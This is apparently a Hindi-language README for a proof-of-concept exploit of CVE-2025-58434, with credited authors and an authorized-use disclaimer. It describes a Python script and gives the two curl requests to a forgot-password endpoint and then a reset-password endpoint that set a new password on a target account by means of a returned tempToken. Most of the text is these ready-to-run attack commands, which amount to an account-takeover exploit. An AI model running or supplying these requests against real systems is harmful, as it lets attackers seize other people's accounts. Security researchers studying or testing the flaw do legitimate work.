
CVE-2025-58434 प्रूफ ऑफ कॉन्सेप्ट
Python प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट POST /api/v1/account/forgot-password को ट्रिगर करने के लिए।
⚠️ केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए। इस उपकरण को उन सिस्टमों के विरुद्ध चलाना जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति नहीं है, अवैध है।
zaddy6 (Isaac David)arthurgervais (Arthur Gervais)CVE-2025-58434 के लिए PoCpoc.py: मशीन URL/IP, बेयर होस्ट/IP उपयोग करने पर वैकल्पिक प्रोटोकॉल, लक्ष्य ईमेल और पासवर्ड के लिए संकेत देता है; फिर अनुरोध भेजता है और के समान HTTP स्थिति, हेडर और प्रतिक्रिया बॉडी प्रिंट करता है।curl -iचलाएँ:
python3 poc.py
फिर प्रदान करें:
10.10.11.10, http://10.10.11.10, या https://target.examplecurl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"<[email protected]>"}}'
curl -i -X POST https://<target>/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{
"user":{
"email":"<[email protected]>",
"tempToken":"<tempToken>",
"password":"NewSecurePassword123!"
}
}'